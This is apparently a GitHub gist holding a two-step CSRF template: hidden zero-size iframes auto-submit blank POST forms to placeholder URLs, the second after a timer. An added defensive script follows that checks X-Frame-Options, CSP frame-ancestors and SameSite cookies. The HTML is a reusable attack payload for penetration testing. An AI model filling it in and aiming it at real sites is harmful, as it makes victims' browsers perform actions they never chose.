Gist hoodoer/b99b8ccbf13e2bfd3cb4cee2ed8f9aec, last active December 10, 2019 09:19
IFrames Based Multi-Step CSRF. X-Frame-Options can block this.
```html
Hello! Two step CSRF coming up...
<iframe src="step1.html" width="0" height="0">
</iframe>
<iframe src="step2.html" width="0" height="0">
</iframe>
```
```html
<!-- Step 1: form1 is submitted as soon as the page loads. Field names and values are left blank in this template. -->
<form name="form1" method="POST" action="https://SOMEURL.com">
<input type="hidden" name="" value="" />
<input type="hidden" name="" value="" />
</form>
<script type="text/javascript">
document.form1.submit();
</script>
```
```html
<!-- Step 2: form2 is submitted after a 10-second timer, so it follows step 1. Field names and values are left blank in this template. -->
<form name="form2" method="POST" action="https://SOMEOTHERURL.com">
<input type="hidden" name="" value="" />
<input type="hidden" name="" value="" />
</form>
<script type="text/javascript">
window.setTimeout(doFormSubmit, 10000);
function doFormSubmit()
{
    document.form2.submit();
}
</script>
```
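As an added example (not part of the original gist), the following JavaScript audits a target response's headers for the control the description names, X-Frame-Options (and its successor, CSP `frame-ancestors`), together with the session cookie's SameSite attribute, which determines whether a cross-site form POST carries the session at all. The function names and the sample header values are assumptions constructed for illustration.

```javascript
// Added example; header values in SAMPLE are constructed, not captured traffic.

// Return the frame-ancestors source list from a CSP header, or null if absent.
function frameAncestors(csp) {
  for (const directive of (csp || "").split(";")) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === "frame-ancestors") {
      return sources.map((s) => s.toLowerCase());
    }
  }
  return null;
}

// True when the response declares that a cross-origin page may not frame it.
// Assumes a single X-Frame-Options value (no comma-joined duplicates).
function blocksCrossOriginFraming(headers) {
  const ancestors = frameAncestors(headers["content-security-policy"]);
  if (ancestors !== null) {
    // Browsers enforce frame-ancestors and ignore X-Frame-Options when both exist.
    return ancestors.every((s) => s === "'none'" || s === "'self'");
  }
  const xfo = (headers["x-frame-options"] || "").trim().toLowerCase();
  // ALLOW-FROM is obsolete and ignored by current browsers, so it does not count.
  return xfo === "deny" || xfo === "sameorigin";
}

// How a browser treats this cookie on a cross-site POST, from its SameSite attribute.
function cookieOnCrossSitePost(setCookie) {
  const m = /;\s*samesite\s*=\s*(strict|lax|none)\s*(;|$)/i.exec(setCookie);
  if (!m) return "browser-default"; // no attribute: behaviour differs by browser
  return m[1].toLowerCase() === "none" ? "sent" : "withheld";
}

// Audit one response: framing headers only affect rendering of the response,
// while SameSite decides whether the POST arrives with the session cookie.
function auditResponse(headers) {
  return {
    framingBlocked: blocksCrossOriginFraming(headers),
    sessionCookie: cookieOnCrossSitePost(headers["set-cookie"] || ""),
  };
}

const SAMPLE = {
  "x-frame-options": "SAMEORIGIN",
  "set-cookie": "session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",
};
console.log(auditResponse(SAMPLE));
```

Header names are expected in lowercase, as Node's `http` module and the Fetch `Headers` iterator present them.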